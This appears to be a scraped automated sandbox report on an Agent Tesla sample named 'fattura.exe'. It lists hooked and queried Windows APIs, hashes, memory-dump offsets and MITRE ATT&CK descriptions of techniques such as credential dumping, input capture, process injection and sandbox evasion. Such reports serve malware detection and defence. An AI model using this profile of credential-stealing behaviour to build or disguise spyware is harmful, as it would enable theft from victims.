Instruction ID: 9dc614b1ad7d857b216d1b90f05f2501ca7a57a9a71b71f5c1c427ed5c341ee7
Opcode Fuzzy Hash: 5bcbc78fa52e8ed8302a117da57e05a1e778249ca3a5ce3e8c2a3d58f0c35843
Instruction Fuzzy Hash: 86718475A10205DFDB14EBB5D8997AE77F2AF85308F108829D802EB395DF38D849CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05CDB4E4, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05CDB62B

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c8f4ce97230332f547372c8c3bbf460a3ba60e7a75a92c3d9865038f80434176
Instruction ID: 2d734a6f26cfae8937b8b1d6214718a7b96cd845c0d80c012e2ec87007c8bfa9
Opcode Fuzzy Hash: c8f4ce97230332f547372c8c3bbf460a3ba60e7a75a92c3d9865038f80434176
Instruction Fuzzy Hash: 735113B0D002188FDB18CFA9C895BADFBF1BF48318F158929E915AB351D774A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 027C0B68, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b809beb94f7a64fce3516e73c5a4264955b6c199c94bebc09f3e28aa3e2e2819
Instruction ID: 52ec3b56baf641d489c9517d1866271430d892d9f0068a013eb5f4dac7456b8e
Opcode Fuzzy Hash: b809beb94f7a64fce3516e73c5a4264955b6c199c94bebc09f3e28aa3e2e2819
Instruction Fuzzy Hash: BD411231E083958FCB11DF79C8106AEBBF1AF8A314F1585AED408A7651DB789845CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02875084, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028751A2

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: df55a050e7d7b432b1d68f29babdea9a01134d8e0655879f4a484408182ef0a4
Instruction ID: ff8d3ee6732b505e063c92b96e117e761ca91cae18144508327403db4d9402ab
Opcode Fuzzy Hash: df55a050e7d7b432b1d68f29babdea9a01134d8e0655879f4a484408182ef0a4
Instruction Fuzzy Hash: EC51BDB5D103499FDF14CFA9C884ADEBBB5BF88314F64822AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02875090, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028751A2

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5f04aa31d9b8b0714763f57a8fcc680ba9b0746889682508143cee99f947fcfe
Instruction ID: 65f7b59c070f68061bcdba5118a0c664774f901ea6fda44b17948ee0e127f606
Opcode Fuzzy Hash: 5f04aa31d9b8b0714763f57a8fcc680ba9b0746889682508143cee99f947fcfe
Instruction Fuzzy Hash: 0641CFB5D10309DFDF14CFA9C884ADEBBB5BF48314F64822AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0270CDE8, Relevance: 1.6, APIs: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0270CEEC

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4b804df9194f3b1ac29c2f0051ff60026bc20f07f675c5b19bc8c658de396c82
Instruction ID: 7fe25d453ea126767f260385f5e941a02788fe3eb34e319c45c3437733449d3d
Opcode Fuzzy Hash: 4b804df9194f3b1ac29c2f0051ff60026bc20f07f675c5b19bc8c658de396c82
Instruction Fuzzy Hash: FD4147B1D04249DFDB00CF99C584B8EFBF1AF49304F29C16AD818AB341D7759849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0270CDD9, Relevance: 1.6, APIs: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0270CEEC

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 1857efde098d7d85390c3762136a38f41d50fdd44f9f742ff5d812f91959dcd1
Instruction ID: 24c2c89dc0a220f18409a60e23e037219c79c7e02b8130aee2f2ab011ad57da7
Opcode Fuzzy Hash: 1857efde098d7d85390c3762136a38f41d50fdd44f9f742ff5d812f91959dcd1
Instruction Fuzzy Hash: F1412571A05248CFDB01CF98C58468EFBF1AF49304F2981AED809AB391D7759949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0287779C, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02877F09

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 72e8b7fee5287126b9b15dc5b513240dbe42997e64e28239a514d5f9ac961bfc
Instruction ID: 506428cec4cbcc8156e3486eb9a8ef6363fc3672d68c30742feaa1b948f405d3
Opcode Fuzzy Hash: 72e8b7fee5287126b9b15dc5b513240dbe42997e64e28239a514d5f9ac961bfc
Instruction Fuzzy Hash: 8D4129B9A002458FDB14CF99C588BAAFBF5FB88314F148459E519AB321D774E841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0270D094, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0270D159

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 30cf459c6d0ab15e60a57523d0d1666082556b26b5f16e203936e8abb2cc4cde
Instruction ID: 501a0da6b9a441db4c552e733ebe495d6de30b0b5e59eb1d1baa14f836e6b076
Opcode Fuzzy Hash: 30cf459c6d0ab15e60a57523d0d1666082556b26b5f16e203936e8abb2cc4cde
Instruction Fuzzy Hash: A241D4B1D00358DFDB20CFA9D984A9EBBF1EF49314F55806AE819AB350D7749906CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0270118C, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0270D159

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 39d86302b907ee54b4c69b1917be241441f8d147d74e590875b2de847386330e
Instruction ID: b3675fd4da0a08532e3fd5dfa4fedf53d83703b96d77469a39f0b39bddf8294e
Opcode Fuzzy Hash: 39d86302b907ee54b4c69b1917be241441f8d147d74e590875b2de847386330e
Instruction Fuzzy Hash: 3931CFB1D00358DFCB20CFD9C984A9EBBF5EB48314F55802AE819AB350DB749909CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02701180, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0270CEEC

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6c8b2b53cf4f7cd2c2fee75482a55a9dc5f3949f509b30e1e232cc3bf8b2d3b9
Instruction ID: 0d3e38c15f52cc29fcab0b2f1f5814a8214359abb86e1043d7ba912e95708588
Opcode Fuzzy Hash: 6c8b2b53cf4f7cd2c2fee75482a55a9dc5f3949f509b30e1e232cc3bf8b2d3b9
Instruction Fuzzy Hash: 0D31F1B1D01249DFDB10CF99C584A8EFFF5AF49304F28826EE809AB350C775A949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05CDC898, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 05CDCEA0

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: e47f2ae8503861f0e0280126bdfc0cbfea60d6df91c3f44bcfc543b4f3e2faeb
Instruction ID: 45d05dd3708d162b621c78540b058052f570b19a13d93f368a785cb45effd97c
Opcode Fuzzy Hash: e47f2ae8503861f0e0280126bdfc0cbfea60d6df91c3f44bcfc543b4f3e2faeb
Instruction Fuzzy Hash: 9131E2B0E44208DFDB14CF99C884BDEFBF5AB48314F24842AE505BB390D7B46945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02876B63, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02876BEF

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 18ab44afe0c564ec1ff736e9c29a0a8783768064d2b0b4b7fedabfae39b75381
Instruction ID: 5dbb89fcdf87d6bd905c533b650990c84ca45e32ea351f9caa2d39490cab578a
Opcode Fuzzy Hash: 18ab44afe0c564ec1ff736e9c29a0a8783768064d2b0b4b7fedabfae39b75381
Instruction Fuzzy Hash: D72114B5900248DFDB10CFA9D984AEEBBF4FB48314F14842AE914A3310D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02876B68, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02876BEF

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8057eec759fe457f0a0b68bc35752e662998487451f55538ed02f6e61a1500a3
Instruction ID: 978826f678cf603b29bf09b499996acafeb6b5bf78eae471615205f259446553
Opcode Fuzzy Hash: 8057eec759fe457f0a0b68bc35752e662998487451f55538ed02f6e61a1500a3
Instruction Fuzzy Hash: 7E21C4B59002589FDB10CF99D984ADEBBF8FB48314F14841AE914A7310D774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027C1931, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027C19B3

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: cc09ace0bb6defe72106d9bd5a678c2829efea3c60ced637b4a11953b5c95fb9
Instruction ID: 172a611b0e91d5180c7cd2c4c30dc9940073e546ae04f0a238fdddcb7a5f7329
Opcode Fuzzy Hash: cc09ace0bb6defe72106d9bd5a678c2829efea3c60ced637b4a11953b5c95fb9
Instruction Fuzzy Hash: 2B213571D042489FDB14CFA9D844BEEBBF4AB88314F10842EE459A7250CB78A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0287BE89, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0287BF12

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: d72f8afe65920ba50c9412714d134f8a3f061d5e7c8e880c8670e3070e6189b6
Instruction ID: 60099b10e530760698a682e68c89bb614442933ea8ef46c0d3e503e55b9b5631
Opcode Fuzzy Hash: d72f8afe65920ba50c9412714d134f8a3f061d5e7c8e880c8670e3070e6189b6
Instruction Fuzzy Hash: 65219D759092458FDB10CFA9D9483AEBFF1EB0A718F14886AD849E7642C7389405CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027C1938, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027C19B3

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c9553623c0de32bd810ddb1e034098eda81bc2ea497783b3ee8b8b37eec28e85
Instruction ID: 082b799b4f658ca5cf3b86993f30106b62ab1c633d00488bdb1370d7e52e5039
Opcode Fuzzy Hash: c9553623c0de32bd810ddb1e034098eda81bc2ea497783b3ee8b8b37eec28e85
Instruction Fuzzy Hash: 5F212771D002499FDB14CFAAD844BEEFBF5BB88314F10842ED459A7250CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027C0C38, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 027C0CA7

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: cf12a13512dcf42a022951e60e49d2d3a89ce5dec34d73cbed14dd465b178b3c
Instruction ID: 26f626c5898b7edaae431e8cff02c777e2e84f7192ab4db8b2c51039ac458986
Opcode Fuzzy Hash: cf12a13512dcf42a022951e60e49d2d3a89ce5dec34d73cbed14dd465b178b3c
Instruction Fuzzy Hash: F02124B1C04259DFCB10CFAAD444BDEFBB0AF48324F15826AD818B7640D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027C9874, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,027CA709,00000800), ref: 027CA79A

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0cac4b30ef64b187309cfd7d0efbc7d491f6d303790445f9d0d3d021d93112bb
Instruction ID: 3244874dd6b4ab9c264a5aa1ac767c308ba57e3ef07159c6703ea769dc51bb65
Opcode Fuzzy Hash: 0cac4b30ef64b187309cfd7d0efbc7d491f6d303790445f9d0d3d021d93112bb
Instruction Fuzzy Hash: C71103B69002499FDB10CFAAD444BDEFBF4EB58324F10842EE819A7610C774A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0287BE98, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0287BF12

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 7903ede88fdd18a2d0c9d18c538c934291dc9c7c132a942e97f5dbc84cf36d6e
Instruction ID: 1a7bee670b62fc05c55fe35e1d8454c11fdc5a11ff1e8ddd700703620eae5b87
Opcode Fuzzy Hash: 7903ede88fdd18a2d0c9d18c538c934291dc9c7c132a942e97f5dbc84cf36d6e
Instruction Fuzzy Hash: 13119D759043098FDF10CFA9D90879EBBF5EB09728F10882AD409E3641C739A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 027CA728, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,027CA709,00000800), ref: 027CA79A

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 665c8ff705da0f91016ae728cdf01829c13415c425b44be38e182005ed92ee97
Instruction ID: 11c32ef8459dbc1e0af2a5b8a91755fb9822b52d578a66a99c00dbd29555b91d
Opcode Fuzzy Hash: 665c8ff705da0f91016ae728cdf01829c13415c425b44be38e182005ed92ee97
Instruction Fuzzy Hash: FF1100B69002098FDB11CFAAD484BEEBBF4FB89314F14842ED819A7610C774A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02873300, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02874116

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a014a2979c09e1b6f86e7b7c65672823ec5386f52bbf6cb16437642a4e6860d3
Instruction ID: f13c72facc62a20432ade210127bfc1fd8f0c47a7f34293149710d2379f866d2
Opcode Fuzzy Hash: a014a2979c09e1b6f86e7b7c65672823ec5386f52bbf6cb16437642a4e6860d3
Instruction Fuzzy Hash: 351102B9D04249CFDB20DF9AD844BDEFBF4EB89214F10846AD829B7600D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CD91DC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05CDC117), ref: 05CDC1A7

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f6b56103dcfcefd986d1ced7e18ccd9c1621e872daa8470e7fd641cdfc59e439
Instruction ID: 920420800acc2196c02f5496844edcf2ffe519b74c9af7b34773d77b9a216fa2
Opcode Fuzzy Hash: f6b56103dcfcefd986d1ced7e18ccd9c1621e872daa8470e7fd641cdfc59e439
Instruction Fuzzy Hash: DA1113B1904218CFDB10CF9AD844B9EFBF4EB49224F10881AD919A7310C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 028740AB, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02874116

Memory Dump Source

Source File: 00000002.00000002.920262341.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 22f39e04762eeb8a26d0954766ee26950338261a8cc06c588f2c8e2d7fab2a56
Instruction ID: 2751e943b9f007dbe23db7314f7e196a23dde31034192344e0d17229256f00a1
Opcode Fuzzy Hash: 22f39e04762eeb8a26d0954766ee26950338261a8cc06c588f2c8e2d7fab2a56
Instruction Fuzzy Hash: F71102B6D002498FDB10CF9AC444BDEFBF4EB89314F10846AD829B7600D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CD94DC, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05CDCD25

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0698f037b689f290ada50b0e1b649359cc3d294f57a37e256c68a4418c0b2d9a
Instruction ID: 9e7ebe4c405350396c1541d446e76aaeeb0b3554e4bf1380763b18dc728146f6
Opcode Fuzzy Hash: 0698f037b689f290ada50b0e1b649359cc3d294f57a37e256c68a4418c0b2d9a
Instruction Fuzzy Hash: 891115B1904248CFCB20CF9AD845BDEFBF4EB48324F108859D919A7700D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CDCCC8, Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05CDCD25

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f65d8b3ae8d53fa8f7e9a0b1152e63a1e4c0828828aed7323a6177baf7a508b5
Instruction ID: ee96eb866929c5c4233a4067858c2bd1b3f589b26176a3d69dc7cc2b267d24ec
Opcode Fuzzy Hash: f65d8b3ae8d53fa8f7e9a0b1152e63a1e4c0828828aed7323a6177baf7a508b5
Instruction Fuzzy Hash: B31115B59002498FCB10CF9AD484BDEFFF4AB48324F24895AD559A7710C378AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report fattura.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

